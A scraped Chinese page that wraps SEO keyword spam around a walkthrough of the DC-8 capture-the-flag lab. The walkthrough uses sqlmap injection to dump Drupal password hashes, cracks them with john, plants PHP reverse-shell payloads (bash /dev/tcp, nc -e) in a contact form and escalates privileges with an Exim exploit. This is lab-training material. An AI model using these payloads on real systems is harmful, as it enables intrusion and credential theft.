当前位置: 首页 > news >正文

咸阳做网站xymokj平面设计培训班学费一般要多少钱

咸阳做网站xymokj,平面设计培训班学费一般要多少钱,网页设计与制作实习报告,企业网站的特点一、环境搭建 kali的IP地址#xff1a;192.168.200.14 DC-8的IP地址#xff1a;192.168.200.13#xff08;一个flag#xff09; 靶机和攻击机处于同一个网络方式#xff1a;nat或桥接 若出现开机错误#xff0c;适当将dc的兼容版本改低#xff0c;我的vmware workst…一、环境搭建 kali的IP地址192.168.200.14 DC-8的IP地址192.168.200.13一个flag 靶机和攻击机处于同一个网络方式nat或桥接 若出现开机错误适当将dc的兼容版本改低我的vmware workstation是17改成16.x就可以兼容 二、信息收集 1、扫描同网段存活主机 第一种方式 arp-scan -l第二种方式 netdiscover -r 192.168.200.0/242、开放端口探测 nmap -sV -p- 192.168.200.13 开放端口有两个22SSH服务默认端口和80http默认端口 3.目录扫描 查看robots。txt文件 这些禁止爬取的文件基本上都访问不了 三漏洞探测 访问web页面 和DC-7一样的CMSDrupalDC-7的版本是8的这个DC-8的版本是7的 不过页面中存在这样的三个不同的URL: http://192.168.200.13/?nid1 http://192.168.200.13/?nid2 http://192.168.200.13/?nid3 可能存在文件包含和SQL注入的漏洞 SQLMAP 1、扫描数据库 sqlmap -u http://192.168.200.13/?nid1 --dbs --batch2、查询数据表名 sqlmap -u http://192.168.200.13/?nid1 -D d7db --tables --batch3、查询字段名 sqlmap -u http://192.168.200.13/?nid1 -D d7db -T users --columns --batch4、查询字段值 sqlmap -u http://192.168.200.13/?nid1 -D d7db -T users -C name,pass --dump账号admin 密码 S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 账号john 密码 S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 四。漏洞利用 1.爆破密码密文 Drupal的hash密文是经过特殊加密的用john进行爆破先保存到password.txt文件中 vim password.txt爆破出来密文turtle 试试 能不能直接账号对 DC-8 进行ssh登录没成功只能想办法获取webshell了 2.反弹shell 先用获得的密码turtle登录试试登录后台应该是john的密码 登录成功 还是运用上一靶场的方法找一找能上传一句话木马的php文件 连不上。然后显示phpinfo的地址死活没反应 直接获取shell PHP反弹 shellPost 请求发送命令?php system(bash -i /dev/tcp/192.168.200.14/8899 01);? #交互式shell?php system(bash -c sh -i /dev/tcp/192.168.200.14/8899 01);? #交互式shell?php exec(nc -e /bin/bash 192.168.200.14 8899); ? 将提交重定向行Confirmation page确认页面给勾上然后滑下点保存联系随便填入联系表单点击发送触发PHP代码 成功反弹shell 3.提权 查一下suid权限的二进制文件 find / -perm -4000 -print 2/dev/null查询Exim 版本为4.89 利用kali搜索EXP 不破坏原有结构复制一份新的命名为shell.sh(到kali端的桌面) cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh 开启http服务 python -m http.server 8899注交互页面方便后续操作 python -c import pty;pty.spawn(/bin/bash)在DC-7中下载该文件 wget //192.168.200.57:8888/shell.sh文件权限是无执行权限的赋予执行权限 chmod 777 shell.sh赋予可执行权限 接着根据sh脚本提示执行文件 ./shell.sh不过奇怪的是执行完之后还是普通权限 查看脚本的使用规则又两个参数可用 将两个规则分别运行第一个规则在运行之后无效第二个规则成功运行等待几秒之后输入whoami可以看到提权成功 近到root目录查看最终flag内容
http://www.zqtcl.cn/news/103535/

相关文章:

  • 网站营销型办公室装修费用会计分录
  • 个人网站网页设计模板学校ftp服务器做网站
  • 黄江网站建设外贸公司用的采购储运财务软件
  • 优化网站公司做网站建设
  • 门户网站的盈利模式网站建设中备案
  • 代码需求网站织梦怎么关闭网站
  • 浙江工信部网站备案查询东圃做网站
  • icp网站域名怎么填写官方网站建设银行年利息是多少钱
  • 沈阳做网站好的信息流优化师证书
  • 做招聘网站创业seo优化工作
  • 如何维护网站建设外卖网站建设价钱
  • 南宁保洁网站建设乌克兰服装网站建设
  • ppt链接网站怎么做的nas云存储做视频网站
  • 上海网站制作公司联系方式设计素材网站照片
  • 林州网站建设价格网络舆情是什么意思
  • 网站外链平台的建设方法平台类型(至少5个)?兰州道路建设情况网站
  • 网站建立健全举报工作机制设计电子商务网站主页
  • 广州市建设工程交易服务中心网站沈阳百度推广哪家好
  • 个人网站备案需要什么网站建立的重要性
  • wordpress用户名西安seo代理计费
  • 网站建设前准备工作手机上传视频网站开发
  • 海口网站建设是什么意思wordpress推广码
  • 杭州市住房和城乡建设厅网站海南网站建设设计
  • 网站建设平台一般多少钱wordpress 本地上传服务器
  • 怎么给网站命名男女做羞羞羞的网站
  • 北京响应式网站建设公司信息流推广方式
  • 一级a做爰片迅雷网站微分销系统定制开发
  • 山东网站建设工作室网页设计全部代码
  • 用c 做网站可以吗注册网站什么要求
  • 销售网站排名销售型网站模板